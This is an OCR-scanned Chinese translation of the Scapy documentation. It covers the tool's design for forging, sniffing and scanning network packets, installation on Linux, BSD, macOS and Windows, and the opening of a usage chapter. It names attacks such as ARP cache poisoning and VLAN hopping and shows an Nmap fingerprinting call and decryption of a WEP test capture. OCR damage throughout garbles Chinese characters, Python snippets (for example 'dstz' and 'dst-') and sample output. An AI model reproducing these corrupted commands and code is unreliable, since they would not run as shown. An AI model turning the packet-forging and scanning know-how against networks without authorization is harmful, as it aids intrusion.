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学 习 Python 


本 人 英文 水 平 有 限 ， 翻 译 不 当 之 处 ， 请 参考 官方 网 站 。 


KT Scapy 


Scapy 是 一 个 可 以 让 用 户 发 送 、 侦 听 和 解析 并 伪装 网 络 报 文 的 Python 程序 。 这 些 
功能 可 以 用 于 制作 侦 测 、 扫 描 和 攻击 网 络 的 工具 。 


换言之 ， Scapy 是 一 个 强大 的 操纵 报 文 的 交互 程序 。 它 可 以 伪造 或 者 解析 多 种 协 
议 的 报 文 ， 还 具有 发 送 、 捕 获 、 匹 配 请 求 和 响应 这 些 报 文 以 及 更 多 的 功 

能 。 Scapy 可 以 轻松 地 做 到 像 扫描 (scanning)、 路 由 跟踪 (tracerouting)、 探 测 
(probing)、 单 元 测试 (unit tests)、 攻 击 (attacks) 和 发 现 网 络 (network discorvery) 这 
样 的 传统 任务 。 它 可 以 代替 hping , arpspoof , arp-sk , arping , pof 甚至 
是 部 分 的 Namp , tcpdump 和 tshark 的 功能 。 


Fingerprinting 


Scanning 


Packet forging 


Scapy 在 大 多 数 其 它 工具 无 法 完成 的 特定 任务 中 也 表现 优 蜡 ， 比 如 发 送 无 效 帧 、 
添加 自 定义 的 802.11 的 侦 、 多 技术 的 结合 (跳跃 攻击 (VLAN hopping)+ARP 缓 存 中 毒 
(ARP cache poisoning)、 在 WEP 加 密 信 道 (WEP encrypted channel) 上 的 VOIP 解码 
















(VOIP decoding)) 等 等 等 等 。 

理念 非常 简单 。 Scapy 主要 做 两 件 事 : 发 送 报 文 和 接收 回应 。 您 定义 一 系列 的 报 
文 ， 它 发 送 这 些 报 文 ， 收 到 回应 ， 将 收 到 的 回应 和 请 求 匹 配 ， 返 回 一 个 存放 着 
(request, answer) 即 (请 求 , 回应 ) 的 报 文 对 (packet couples) 的 列表 (listy 和 一 个 没有 匹 
配 的 报 文 的 列表 (list)。 这 样 对 于 像 Nmap 和 hping 这 样 的 工具 有 一 个 巨大 的 优 
3 : 回应 没有 被 减少 (open/closedWfiltered) 而 是 完整 的 报 文 。 


在 这 之 上 可 以 建立 更 多 的 高 级 功能 ， 比 如 您 可 以 跟踪 路 由 (traceroutes) 并 得 到 一 个 
只 有 请 求 的 起 始 TTL 和 回应 的 源 IP 的 结果 ， 您 也 可 以 ping 整 个 网 络 并 得 到 匹配 的 回 
复 的 列表 ， 您 还 可 以 扫描 商品 并 得 到 一 个 <nobr> LATEX </nobr> 报表 。 


Scapy 为 何如 此 特别 


第 一 ， 对 于 其 它 的 大 多 数 网 络 工具 来 说 ， 您 无 法 制作 一 些 作者 无 法 想到 的 东西 。 这 
些 工具 已 经 被 一 个 特定 的 目标 所 局 限 和 国定 ， 因 此 无 法 和 这 个 目标 有 大 的 偏离 。 比 
如 ， 一 个 ARP 缓 存 中 毒 程 序 不 会 让 您 使 用 double 802.1q 包 庄 内 容 ， 同 样 无 法 找 
到 一 个 程序 可 以 发 送 卉 充 (padding) 的 ICMP 报 文 ( 是 填充 (padding)， 不 是 负载 
(payload))。 事 实 上 ， 每 次 有 新 需求 时 ， 您 必需 重新 建立 一 个 新 的 工具 。 


第 二 ， 这 些 工具 经 常 混淆 解码 (decoding) 和 解释 (interpreting)。 机 器 擅长 解码 并 能 帮 
助人 类 完成 这 个 工作 。 解 释 应 该 留 给 人 类 。 一 些 程序 试图 模拟 这 个 行为 。 比 如 它们 
说 “这 个 端口 是 打开 的 "而 不 是 说 “我 收 到 一 个 SYN-ACK“. 有 时 它们 是 对 的 ， 但 有 时 
不 是 。 这 样 做 对 于 初学 者 来 说 更 容易 ， 但 是 当 您 知道 您 正在 做 什么 ， 您 将 继续 试图 
推 从 程序 的 解释 中 测 实际 上 发 生 了 什么 来 制作 自己 的 工具 ， 但 是 这 相当 困难 ， 因 为 
大 量 的 信息 已 经 丢失 。 因 此 最 终 常 常 是 您 使 用 tcpdump -xX 来 解码 和 解释 这 些 工 
具 丢 掉 的 内 容 。 


第 三 ， 即 使 是 那些 只 管 解码 的 程序 也 没有 把 它们 收 到 的 所 有 的 信息 交 给 您 。 它 们 给 
您 展示 的 网 络 信息 只 是 其 作者 认为 足够 的 信息 。 但 是 这 些 并 不 完整 ， 对 您 来 说 是 偏 
颇 的 。 比 如 ， 您 知道 有 什么 工具 可 以 得 到 以 太 帧 填充 的 报 文 吗 (reports the Ethernet 
padding)? 


事实 上 ， 每 次 运行 本 程序 ， 更 像 是 建造 一 个 新 的 工具 ， 不 是 处 理 上 百 行 的 C 程 序 代 
码 ， 您 使 用 Scapy 只 需 写 几 行 代码 。 
在 探测 (probe)( 或 者 扫描 (scan)、 路 由 跟踪 (traceroute) 等 等 ) 之 后 ， Scapy 总 是 在 


任何 的 解释 之 前 把 探测 到 的 所 有 的 包 解 码 后 给 您 。 这 意味 着 您 可 以 探测 一 次 而 解释 
很 多 次 ， 也 可 以 使 用 路 由 跟踪 并 查看 报 文 卉 充 内 容 。 


快速 的 报 文 设计 


其 它 的 工具 坚持 命令 行 运 行 的 模式 ， 这 导致 描述 一 个 报 文 需要 糟糕 的 语法 。 对 于 这 
些 工 具 ， 解 决 的 方法 是 在 其 作者 想像 的 情景 下 ， 采 用 一 种 更 高 层 但 是 功能 更 弱 的 描 
述 方法 。 举 例 来 说 ， 在 端口 扫描 的 情景 中 ， 端 口 扫 描 器 必须 的 参数 只 有 IP 地 址 。 即 


使 情景 有 所 改变 ， 情 况 依然 如 此 (Even if the scenario is tweaked a bit, you still are 
stuck to a port scan)。 


Scapy 的 原则 是 推荐 使 用 一 种 特定 领域 语言 (Domain Specific Language (DSL)) V4 
达到 对 于 任何 种 类 报 文 的 功能 强大 并 快速 的 描述 。 使 用 Python 语法 
和 Python 解释 器 作为 特定 领域 语言 (DSL) 的 语法 和 解释 器 有 许多 优势 : 没有 必要 
写 一 个 单独 的 解释 器 ， 用 户 不 需要 再 学 一 种 新 语言 并 可 以 从 这 个 完整 、 简 约 且 非常 
强大 的 语言 中 受益 。 


Scapy 允许 用 户 将 一 个 或 一 系列 报 文 描 述 成 为 一 个 个 堆 起 来 的 层 (layer)。 每 层 的 
数据 域 有 有 用 的 且 可 重 载 的 默认 值 。 Scapy 不 强制 用 户 使 用 预先 定义 的 方法 和 模 
板 。 这 样 每 次 碰 到 不 同 的 情景 时 写 新 工具 的 需要 得 到 了 减少 。 在 C 语 言 中 ， 描 述 一 
个 报 文 可 能 平均 要 用 60 行 代码 。 使 用 Scapy ， 发 送 的 报 文 可 能 仅 需 一 行 代 码 描 述 
再 加 一 行 打印 结果 的 代码 。90% 的 网 络 探测 工具 可 以 使 用 Scapy 使 用 2 行 代码 重新 
FHL ° 


一 次 探测 ， 多 次 解释 


网 络 的 发 现 是 一 个 黑 盒 测试 。 当 探测 一 个 网 络 时 ， 许 多 侦 测 报 文 (Stimuli) 发 送 然 而 
它们 当中 只 有 少数 能 够 被 回应 。 如 果 选 择 了 正确 的 侦 测 报 文 ， 和 希望 得 到 的 信息 可 以 
通过 回应 的 报 文 或 者 是 没有 回应 的 情况 来 获得 。 不 像 很 多 其 它 的 工具 ， Scapy 得 
到 所 有 的 信息 ， 也 就 是 说 ， 所 有 的 发 送 的 侦 测 报 文 和 所 有 收 到 的 回应 。 通 过 检查 这 
些 数据 用 户 可 以 得 到 想 要 的 信息 。 当 数据 量 较 小 时 ， 用 户 可 以 直接 查看 数据 。 在 其 
它 情 况 下 ， 对 于 数据 的 解释 将 依赖 于 关注 点 的 不 同 。 多 数 工 具 选 择 展 示 关 注 点 内 容 
而 忽略 和 关注 点 无 关 的 内 容 。 由 于 Scapy 给 出 完整 的 原始 数据 ， 因 此 这 些 数据 可 
以 多 次 使 用 从 而 允许 关注 点 在 分 析 过 程 中 发 生变 化 。 比 如 ， 可 能 探测 一 个 TCP 端 口 
扫描 而 关注 (展示 ) 端 口 扫描 的 结果 。 同 时 也 可 以 查看 回应 报 文 的 TTL 方 面 的 内 容 。 
一 个 新 的 探测 并 不 需要 再 来 一 次 ， 而 只 是 在 已 有 的 数据 中 改 一 下 关注 点 即 可 。 


Implicit packet set 
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Unanswered packets 


Scapy 解码 而 不 解释 


网 络 探测 工具 所 共有 的 一 个 问题 是 它们 都 试图 解释 收 到 的 回应 而 非 仅 仅 解码 并 给 
结果 。 报 告 一 些 类 似 于 在 80 端 口 收 到 一 个 TCP Reset 报 文 这 样 的 消息 不 属于 解释 错 
误 。 报 告 80 端 口 关闭 在 多 数 情 况 下 是 正确 的 ， 但 是 在 某 些 特定 的 工具 的 作者 没有 想 
到 的 上 下 文中 是 错误 的 。 比 如 ， 一 些 扫描 器 在 收 到 一 个 目的 地 址 不 可 达 的 ICMP 报 
文 后 倾向 于 报告 一 个 过 滤 TCP 端 口 。 这 可 能 是 正确 的 ， 但 是 在 某 些 情况 下 ， 这 表明 
报 文 被 防火 墙 过 滤 掉 而 找 不 到 报 文 的 非 目 的 主机 。 


Anu 吉 果 可 以 帮助 那些 不 知道 什么 是 端口 扫描 的 用 户 ， 但 是 璀 大 于 利 ， 因 为 这 对 于 

结果 是 一 种 主观 的 解释 。 可 能 的 结果 就 是 它们 可 以 自己 解释 ， 知 识 丰 富 的 用 户 将 试 
图 反 向 还 原 这 个 工具 的 解释 以 得 到 引起 这 个 解释 的 真正 原因 。 不 幸 的 是 ， 在 这 个 过 
程 中 有 大 量 的 信息 丢失 。 


Rik Æ 7T (Quick demo) 


首先 我 们 稍微 试 一 下 ， 一 次 创 Ee La 的 。 我 们 首 
先 初 始 化 IP 类 。 然 后 ， 我 们 重新 将 其 实例 化 并 给 出 4 个 IP 报 文 的 目的 地 址 (/30 给 出 掩 
码 )。 使 用 Python 语法 ， 我 们 在 一 系列 明确 的 报 文中 定义 这 个 报 文 (we develop 
this implicit packet in a set of explicit packets)。 然 后 ， 我 们 退出 解释 器 。 作 为 我 们 
提供 的 会 话 文件 (session file)， 这 些 我 们 正在 使 用 变量 已 经 保存 ， 然 后 重新 加 载 : 


# ./scapy.py -s mysession 

New session [mysession] 

Welcome to Scapy (0.9.17.108beta) 

>>> IP() 

«IP |» 

>>> target="www. target.com" 

>>> target="www.target.com/30" 

>>> ip=IP(dst=target) 

>>> ip 

«IP dst-«Net www.target.com/30» |> 

>>> [p for p in ip] 

[<IP dst-207.171.175.28 |», «IP dst-207.171.175.29 |» 
«IP dst-207.171.175.30 |», «IP dst-207.171.175.31 |>] 
>>> ^D 


# scapy -s mysession 

Using session [mysession] 

Welcome to Scapy (0.9.17.108beta) 
>>> ip 

«IP dst-«Net www.target.com/30 |» 


现在 ， 我 们 来 操纵 一 些 报 文 : 


>>> IP() 

«IP |» 

>>> a=IP(dst="172.16.1.40") 
SUP dst=172.16.1.40 |> 

>>> a.dst 

1172. 16.11405 

>>> a.ttl 

64 


让 我 们 来 说 我 想 要 一 个 广播 的 MAC 地 址 ， 并 且 负 载 的 IP 报 文 要 到 达 ketchup.com 和 
mayo.com，TTL 值 从 1 到 9， 并 负载 UDP 报 文 : 


>>> Ether(dstz"ff:ff:ff:ff:ff:Tf") 
/IP(dst-["ketchup.com", "mayo.com"], ttl=(1,9)) 
/UDP() 


现在 我 们 在 一 行 (一 个 确定 报 文 (implicit packet)) F €L Y 184 4& ° 


合理 的 默认 值 


Scapy 试图 在 所 有 种 类 的 报 文 数据 域 中 使 用 合理 的 默认 值 ， 如 果 没 有 被 重 载 的 
话 ， 


IP 源 地 址 根据 目的 地 址 和 路 由 表 选 择 

校 验 和 自动 计算 

源 MAC 地 址 根据 输出 接口 (output interface) 选 择 
以 大 网 类 型 和 |P 协 议 由 高 层 决定 


Example : Default Values for IP 


>>> 1s(IP) 

version : BitField = (4) 
ihl : BitField = (None) 
tos : XByteField = (0) 
len : ShortField = (None) 
id : ShortField = (1) 
flags : FlagsField = (0) 
frag : BitField = (0) 
ttl : ByteField = (64) 
proto : ByteEnumField = (0) 
chksum : XShortField = (None) 
src : Emph = (None) 
dst : Emph = e D 0. T 


options : IPoptionsField = Ss 


其 它 数据 域 选 择 最 有 用 的 值 : 


e TCP 源 端口 为 20, 目 的 端口 为 80 
e UDP 源 端口 和 目的 端口 均 为 53 
e ICMP #! A echo request 


学 习 Python 


Scapy 使 用 Python 解释 器 作为 命令 面板 。 这 意味 着 你 可 以 直接 使 用 Python 语 
言 (创建 变量 ， 使 用 循环 ， 定 义 部 数 等 等 )。 


如 果 你 刚 开 始 使 用 Python 并 且 因 此 你 不 理解 这 些 词语 ， 或 者 如 果 你 想 学 习 这 个 语 
言 ， 花 一 个 小 时 来 阅读 一 个 Guido Van Rossum 写 的 非常 棒 的 Python 教程 。 在 此 之 

后 ， 你 将 知道 Python :)(# 69 ! )。 对 于 更 加 深入 的 学 习 ，Dive Into Python 也 是 一 
个 很 好 的 开始 。 


作为 一 个 快速 的 开始 ， 下 面 是 Python 数据 类 型 的 概览 : 


int (Signed, 32bits) : 42 

long (signed, infinite) : 42L 

str : "bell\x07\n" or 'bell\x07\n' 
tuple (immutable): (1,4,"42") 

list (mutable): [4,2,"1"] 

dict (mutable): {"one":1, "two":2) 


Python 中 没有 块 分 割 符 ， 而 是 同 缩 进 决定 : 


if cond: 
instr 
instr 
elif cond2: 
instr 
else: 
instr 


下 载 和 安装 


译 者 : 飞龙 
原文 : Download and Installation 


协议 : CC BY-NC-SA 4.0 


概览 


安装 & Python 2.5。 

TAXE 安装 Scapy ° 
(对 于 非 Linux 平 台 ) :安装 libpcap 和 libdnet 及 其 Python 包装 器 。 
(Jw) : 安装 用 于 特殊 功 芭 的 其 他 软件 。 

使 用 root 权限 运 云 行 Scapy。 


每 个 步 又 可 以 以 不 同 的 方式 完成 ， 具 体 取决 于 你 的 平台 和 要 使 用 的 Scapy 版 本 。 
目前 ，Scapy 有 两 个 不 同 版 本 : 
e Scapy V1.x。 它 只 包含 一 个 文件 ， 并 适用 于 Python 2.4， 因 此 它 可 能 更 易于 安 
Ro 此外， 你 的 操作 系统 可 能 已 经 含有 一 个 为 之 特别 准备 的 包 或 端口 。 最 后 
一 个 版 本 是 v1.2.2。 


e Scapy V2.x。 当 前 的 开发 版 本 增加 了 多 个 功能 (例如 1IPv6) 。 它 包括 
以 distutils 标准 方式 打包 的 几 个 文件 。Scapy v2 需要 Python 2.5。 


注意 : 在 Scapy v2 中 使 用 from scapy.all import * 来 代 
# from scapy import * ° 


安装 Scapy v2.x 


以 下 步骤 描述 如 何 安装 〈 或 更 新 ) Scapy AH ° 根据 你 的 平台 ， 可 能 需要 安装 一 些 
额外 的 库 才 能 使 其 真正 工作 。 所 以 ， 请 大 家 在 平台 特定 之 指南 中 查看 如 何 安装 这 些 


必需 的 东西 。 


注意 : 以 下 步骤 适用 于 类 Unix 操作 系统 (Linux ° BSD ° MacOSX) ° 对 于 
Windows ° Tñ dà 阅 下 面 的 特殊 章节 。 


确保 在 继续 之 前 安装 了 Python ° 
最 新 发 行 版 


将 最 新 版 本 下 载 到 临时 目录 ， 并 以 distutils 标准 方式 来 安装 。 


cd /tmp 

wget scapy.net 

unzip scapy-latest.zip 

cd scapy-2.* 

sudo python setup.py install 


€) @ 09 @ € 


或 者 ， 你 也 可 以 执行 Zip 文件 : 


$ chmod +x scapy-latest.zip 
$ sudo ./scapy-latest.zip 


ce He 
$ sudo sh scapy-latest.zip 
或 者 : 


$ mv scapy-latest.zip /usr/local/bin/scapy 
$ sudo scapy 


注意 : 要 制作 zip 可 执行 文件 ， 需 要 在 zip 标 头 之 前 添加 一 些 字 节 。 大 多 数 但 
并 不 是 所 有 zip 程序 都 会 处 理 它 。 如 果 你 的 zip 程序 报告 该 zip 文件 被 损坏 ， 

可 以 更 改 它 ， 或 在 http://hg.secdev.org/scapy/archiveltip.zip 下 载 一 个 不 可 执 

行 的 zip 文件 。 


当前 开发 版 
如 果 你 总 想 使 用 带 有 所 有 新 功能 和 错误 修正 的 最 新 版 本 ， 请 使 用 Scapy 的 


Mercurial 仓库 : 


1. 安装 Mercurial 版 本 控制 系统 ， 例 如 ， 在 Debian/Ubuntu 下 执行 


$ sudo apt-get install mercurial 


或 者 在 OpenBSD 上 : 


$ pkg_add mercurial 


2. 克隆 Scapy 仓库 


$ hg clone http://hg.secdev.org/scapy 


3. VA distutils 标准 方式 来 安装 Scapy : 


$ cd scapy 
$ sudo python setup.py install 


之 后 你 可 以 始终 更 新 到 最 新 版 本 : 


$ hg pull 
$ hg update 
$ sudo python setup.py install 


Mercurial 的 更 多 信息 请 参阅 Mercurial book » 


% £ Scapy v1.2 


由 于 Scapy v1 £ PEU. 一 的 Python 文件 ， 安 装 很 容易 : 只 需 下 载 最 新 版 本 并 
使 用 Python 解释 器 运行 它 : 


$ wget http://hg.secdev.org/scapy/raw-file/v1.2.0.2/scapy.py 
$ sudo python scapy.py 


在 BSD 系统 上 ， 你 还 可 以 尝试 使 用 最 新 版 本 的 Scapy-bpf (开发 仓库 ) ° CHE 
要 libpcap 或 libdnet 。 


用 于 特殊 功能 的 可 选 软件 


对 于 某 些 特殊 功能 ， 你 必须 安装 更 多 软件 。 有 关 如 何 安装 这 些 包 的 平台 特定 说 明 ， 
请 参见 下 一 节 。 这 里 是 涉及 的 主题 和 一 些 例子 ， 你 可 以 使 用 它们 来 党 试 是 否 能 够 安 


e 绘图 。 plot() 需要 Gnuplot-py， 它 需要 GnuPlot 和 NumPy » 


>>> p=sniff(count=50) 
>>> p.plot(lambda x:len(x)) 


e 2D 图 形 。 psdump() 和 pdfdump() 需要 PyX， 而 这 需要 一 个 LaTeX 分 发 
版 。 要 以 交互 方式 查看 PDF 和 PS 文件 ， 你 还 需要 Adobe 
Reader ( acroread ) 和 gv(gv ) ° 


>>> p-IP()/ICMP() 
>>> p.pdfdump("test.pdf") 


e 图 形 。 conversations() 需要 Grapviz fe ImageMagick ° 


>>> p=readpcap("myfile.pcap") 
>>> p.conversations(type="jpg", target="> test.jpg") 


e 3D 图 形 。 trace3D() € € VPython ° 


>>> a,u=traceroute(["www.python.org", "google.com", "slashdot 


-org"]) 
>>> a.trace3D() 


e WEP 解密 。 unwep() 需要 PyCrypto。 例 子 中 使 用 了 Weplap 测试 文件 。 


>>> enc=rdpcap("weplab-64bit -AA-managed.pcap" ) 
>>> enc. show( ) 

>>> enc[9] 

>>> conf.wepkey="AA\x00\x00\x00" 

>>> dec-DotiiPacketList(enc).toEthernet() 

>>> dec. show( ) 

>>> dec[0] 


e 指纹 识别 。 nmap fp() 需要 Nmap。 你 需要 支持 第 一 代 指 纹 识别 的 老 版 本 
(v4.23 之 前 ) ° 


>>> load module("nmap") 

>>> nmap fp("192.168.0.1") 

Begin emission: 

Finished to send 8 packets. 

Received 19 packets, got 4 answers, remaining 4 packets 
(0.88749999999999996, ['Draytek Vigor 2000 ISDN router']) 


e VOIP ° voip play() 需要 SoX ° 
平台 特定 指南 


Linux 原生 


Scapy 可 以 在 Linux 上 原生 运行 ， 不 需要 libdnet 和 libpcap ° 


安装 Python 2.5 ° 安装 tcpdump 并 确保 它 在 $ PATH T» ( 它 只 用 于 编译 BPF 
过 滤器 ( -ddd 选项 ) ) 确保 你 的 内 核 已 选择 分 组 套 接 字 ( CONFIG PACKET ) 
如 果 你 的 内 核 «2.6 ， 请 确保 选择 套 接 字 过 滤 ( CONFIG FILTER ) 


Debian/Ubuntu 
只 需 使 用 标准 包 : 


$ sudo apt-get install tcpdump graphviz imagemagick python-gnupl 
ot python-crypto python-pyx 


Fedora 


这 里 是 在 Fedora 9 中 安装 Scapy 的 方法 : 


# yum install mercurial python-devel 
# cd /tmp 

# hg clone http://hg.secdev.org/scapy 
# cd scapy 

# python setup.py install 


# yum install graphviz python-crypto sox PyX gnuplot numpy 

# cd /tmp 

# wget http://heanet.dl.sourceforge.net/sourceforge/gnuplot-py/g 
nuplot-py-1.8.tar.gz 

# tar xvfz gnuplot-py-1.8.tar.gz 

# cd gnuplot-py-1.8 

# python setup.py install 


Mac OS X 
以 下 是 在 Mac OS 10.4 (Tiger) 或 10.5 (Leopard) 上 安装 Scapy 的 方式 。 


建立 环境 变量 


e 安装 X11。 在 MacOSXDVD 上 ， 它 位 于 『 可 选 Installs.mpkgJ 软件 包 中 。 

e 安装 SDK。 在 Mac OS X DVD 上 ， 它 位 于 [Xcode Tools/PackagesJ 目录 
中 。 

e 从 Python.org 安装 Python 2.5。 使 用 Apple 的 Python 版 本 会 导致 一 些 问 
题 。 请 见 http://www.python.org/ftp/python/2.5.2/python-2.5.2-macosx.dmg ° 


使 用 MacPorts 安装 
e 从 macports.org 下 载 dmg 并 安装 它 。 
e 更 新 MacPorts : 


$ sudo port -d selfupdate 


d 


e 安装 Scapy : 


$ sudo port install scapy 


像 上 面 的 通用 安装 所 展示 的 那样 ， 随 后 你 可 以 更 新 到 最 新 版 。 


从 源码 安装 


2, 


安装 libdnet 和 Python 包装 器 : 


$ wget http://libdnet.googlecode.com/files/libdnet-1.12.tgz 
$ tar xfz libdnet-1.12.tgz 

$ ./configure 

$ make 

$ sudo make install 

$ cd python 

$ python2.5 setup.py install 


E J+ Be 


安装 libpcap 和 Python 包装 器 : 


$ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylib 
pcap-0.6.2.tar.gz 

$ tar xfz pylibpcap-0.6.2.tar.gz 

$ cd pylibpcap-0.6.2 

$ python2.5 setup.py install 


d 


可 选 : 安装 readline 


$ python “python -c "import pimp; print pimp. file " -i readl 
ine 


OpenBSD 


这 里 是 在 OpenBSD 中 安装 Scapy 的 方式 : 


# export PKG PATH-ftp://ftp.openbsd.org/pub/OpenBSD/4.3/packages 
/1386/ 

pkg_add py-libpcap py-libdnet mercurial 

ln -sf /usr/local/bin/python2.5 /usr/local/bin/python 

cd /tmp 

hg clone http://hg.secdev.org/scapy 

cd scapy 

python setup.py install 


dk db dt dt dt +H 


可 选 包 
py-crypto 


# pkg add py-crypto 


Graphviz 〈 下 载 的 东西 多 ， 会 安装 多 个 GNOME È) 


# pkg add graphviz 


ImageMagick (需要 较 长 时 间 来 编译 ) 


cd /tmp 

ftp ftp://ftp.openbsd.org/pub/OpenBSD/4.3/ports.tar.gz 
cd /usr 

tar xvfz /tmp/ports.tar.gz 

cd /usr/ports/graphics/ImageMagick/ 

make install 


dk db dk dt dto dt 


PyX (下 载 的 东西 非常 多 ， 会 安装 textlive 以 及 其 他 ) 
# pkg add py-pyx 
/etc/ethertypes 


# wget http: //www.secdev.org/projects/scapy/files/ethertypes -0 
/etc/ethertypes 


python-bz2 (用 于 UTscapy) 


# pkg add python-bz2 


Windows 


Scapy 主要 是 为 类 Unix 系统 开发 的 ° 并 且 在 这 些 平台 上 能 正常 工作 。 但 是 最 新 版 
本 的 Scapy Fr fü EP 支持 Windows ° 所 以 你 可 以 在 Windows 机 器 上 使 用 几乎 所 
有 的 Scapy 的 功能 。 


SY = -+- dm XE 41] 2 AAE Gy 
(ER . WAAR TAA Sca P /-WII in 1] V 1. 2.( HW] 2 | od 
) 


Capy / v2 > 






用 scapy.all import * 而 了 i ee rom scapy impor 


s=IPCdst="google.com'>/ICMPC> 
s.show(> 
HHH[ IP num 


sniff(timeout-18» 





需要 以 下 软件 包 才 能 在 Windows 上 安装 Scapy : 


e Python: python-2.5.4.msi 或 python-2.6.3.msi 。 安 装 后 ， 将 Python 
安装 目录 及 其 Scripts 子 目录 添加 到 PATH 。 根 据 你 的 Python 版本， 默认 
分 别 


日 


是 C:\ Python25 和 C:\Python25\Scripts 或 C:\Python26 和 C:NPytho 

e Scapy : A Mercurial 仓库 的 最 新 开发 版 本 。 解 压缩 归档 文件 ， 在 该 目录 中 
打开 命令 提示 符 并 运行 python setup.py install ° 

e pywin32 : pywin32-214.win32-py2.5.exe 或 pywin32-214.win32-py2.6. 


e WinPcap : WinPcap. 4 1 1.exe 可 能 需要 选 
择 [x] Automatically start the OO driver at boot time (#4 
动 时 自动 启动 WinPcap 驱动 程序 ) ， 以 便 非 特权 用 户 可 以 嗅 探 ， 特 别 是 在 
Vista 和 Windows 7 下 。 如 果 要 使 用 以 太 网 供应 商 数据 库 来 解析 MAC 地 址 或 
使 用 wireshark() 命令 ， 请 下 载 已 经 包含 WinPcap 的 Wireshark ° 
e pypcap : pcap-1.1-scapy-20090720.win32-py25.exe 或 pcap-1.1-scapy 
。 这 是 Scapy 的 特殊 版 本 ， 因 为 原始 版 本 会 导致 一 些 时 序 问题 。 现 在 在 Vista 
和 Windows 7 上 也 可 工作 。 在 Vista/Win7 下 ， 右 键 单 击 安 装 程序 并 选 
择 Run as administrator (以 管理 员 身 份 运 行 ) 。 
e libdnet : dnet-1.12.win32-py2.5.exe 或 dnet-1.12.win32-py2.6.exe 
o Æ Vista/Win7 下 ， 右 键 单 击 安装 程序 ， 选 择 Run as administrator (以 


管理 员 身 份 运行 ) 。 
e pyreadline : pyreadline-1.5-win32-setup.exe “。 


只 需 下 载 文 件 并 运行 安装 程 选择 默认 安装 选项 应 该 会 安全 。 


为 了 方便 起 见 ， 链 接 中 直接 给 出 了 我 使 用 的 版 本 (对 于 Python 2.5 和 Python 

2.6) 。 PG EAHERAER . 的 是 不 同 的 Python 版 本 ， 只 需 访 问 相 
应 软件 包 的 主页 并 查找 Windows 二 进 制 文件 即 可 。 你 可 以 在 网 上 搜索 文件 名 作为 
最 后 的 手段 。 


安装 所 有 软件 包 后 ， 打 开 命令 提示 符 ( cmd.exe ) ， 然 后 键入 scapy 运行 
Scapy。 如 果 你 正确 设置 了 PATH ， 这 将 在 CiNPython26NScripts 目录 中 会 找到 
一 个 批 处 理 文件 ， 并 指导 Python 解释 器 加 载 Scapy ° 


如 果 不 能 正常 工作 ， 考 虑 跳 过 Windows 版 本 ， 并 从 Linux Live CD 中 使 用 Scapy - 
在 Windows 主机 上 的 虚拟 机 中 ， 或 通过 从 CDROM 引导 : 例如 旧版 本 的 Scapy 已 
经 包含 在 grml 和 BackTrack 中 。 在 使 用 Live CD 时 ， 你 可 以 通过 键 

A cd /tmp && wget scapy.net 轻松 升级 到 最 新 的 Scapy 版 本 。 


可 选 包 
绘图 ( plot ) 


e GnuPlot: gp420win32.zip 。 解压 zip 文件 (例如 到 c:Ngnuplot ) ， 并 
将 gnuplot\bin 目录 添加 到 PATH 。 
e NumPy : numpy-1.3.0-win32-superpack-python2.5.exe 或 numpy-1.3.6 
° Gnuplot-py 1.8 需要 NumPy ° 
e Gnuplot-py: gnuplot-py-1.8.zip ° 解压 到 临时 目录 ， 打 开 命 令 提 示 
入 临时 目录 并 键入 python setup.py install 。 


2D 图 形 ( psdump > pdfdump ) 


e PyX: PyX-0.10.tar.gz 。 解压 到 临时 目录 ， 打 开 命 令 提示 符 ， 进 入 临时 目 
录 并 键入 python setup.py install 。 
° MikTeX : AA prz im ° i 需要 安装 LaTeX 。 选择 一 个 不 带 
空格 的 安装 目录 (例如 C\MikTex2.8 ， 并 将 (INSTALLDIR)\miktex\bin + 
目 ， PATH ° 


图 形 ( conversations ) 


e Graphviz: graphviz-2.24.exe 。 
将 (INSTALLDIR)\ATT\Graphviz\bin 添加 到 你 的 PATH 。 


WEP 加 密 


PyCrypto : pycrypto-2.1.0.win32-py2.5.zip 或 pycrypto-2.1.0.win32-py2 


指纹 识别 


Nmap ° nmap-4.20-setup.exe 。 如 果 使 用 默认 安装 目录 ，Scapy 应 自动 查找 指 
纹 文 件 。 Queso: queso-980922.tar.gz ° Æ tar.gz 文件 (例如 使 用 7- 
Zip) 并 将 queso.conf 放 入 你 的 Scapy 目录 


截图 


= C:\WINDOWS\system32\cmd.exe - scapy. py -olx 
E 


IP / ICMP -233.167.99 192.168.1.180 echo-reply Padding 


IP ICMP 64.233.167.99 192.168.1.18@ echo-reply Padding 


IP ICMP 64.233.167.99 192.168.1.16 echo-reply Padding 
IP ICMP 64.233.167.99 


IP ICMP 64.233.167.99 


192.168.1.16 echo-reply Padding 


> 1 
> 1 
> 1 
IP ICMP 64.233.167.99 > 192.168.1.18@ echo-reply Padding 
> 1 
> 1 


192.168.1.10 echo-reply Padding 
IP ICMP 192.168.1.10 > 64.233.167.99 echo-request 
IP ICMP 64.233.167.99 > 192.168.1.10 echo-reply B Padding 
IP ICMP 64.233.167.99 > 192.168.1.1@ echo-reply B Padding 
IP ⁄ ICMP 64.233.167.99 > 192.168.1.18 echo-reply 8 Padding 
Fen 23 packets, received 16 packets. 69.6% hits. 


2, < 
>> 





已 知 Bug 


e 你 可 能 无 法 在 Windows 上 捕获 WLAN 流量 。 原因 在 Wireshark wiki 和 
WinPcap 常见 问题 中 有 解释 。 尝试 关闭 混合 模 
X conf.sniff promisc = False ° 

e 数据 包 无 法 发 送 到 localhost (或 你 自己 的 主机 上 的 本 机 IP 地 址 ) © 

e voip play() 骂 数 不 工作 ， 因 为 他 们 通过 /dev/dsp 输出 声音 ， 这 在 
Windows 上 不 可 用 。 


使 用 方法 


译 者 : Larry 
来 源 : Scapy 中 文 使 用 文档 
原文 : Usage 


协议 : CC BY-NC-SA 2.5 


0x01 起 航 Scapy 


Scapy 的 交互 shell 是 运行 在 一 个 终端 会 话 当中 。 因 为 需要 root 权 限 才能 发 送 数据 
包 ， 所 以 我 们 在 这 里 使 用 sudo 


$ sudo scapy 
Welcome to Scapy (2.0.1-dev) 


>>> 
在 Windows 当 中 ， 请 打开 命令 提示 符 ( cmd.exe ) ， 并 确保 您 拥有 管理 员 权 限 : 
C:\>scapy 


INFO: No IPv6 support in kernel 

WARNING: No route found for IPv6 destination :: (no default rout 
e?) 

Welcome to Scapy (2.0.1-dev) 

>>> 


如 果 您 没有 安装 所 有 的 可 选 包 ，Scapy 将 会 告诉 你 有 些 功能 不 可 


INFO: Can't import python gnuplot wrapper . Won't be able to plo 
t. 
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump 
(). 


